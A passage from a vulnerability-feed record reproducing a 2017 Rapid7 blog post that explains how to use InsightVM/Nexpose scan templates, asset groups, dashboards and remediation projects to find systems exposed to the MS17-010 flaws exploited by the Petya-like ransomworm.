color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds &lt;=&gt; ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:4cc42a3f-1295-4630-8a24-898587c6b2dc] -->", "published": "2017-06-30T15:40:50", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "lastseen": "2017-06-30T19:17:17", "viewCount": 138, "enchantments": {}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.4", "references": []}}], "modified": "2017-08-03T16:56:04", "lastseen": "2017-08-03T17:21:32", "published": "2017-08-03T16:56:04", "description": "<!-- [DocumentBodyStart:880a7067-953c-4d86-bb9f-22e02d26586e] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. It is believed that the ransomworm achieved its initial infection via a compromised software update, and that it then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds &lt;=&gt; ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" 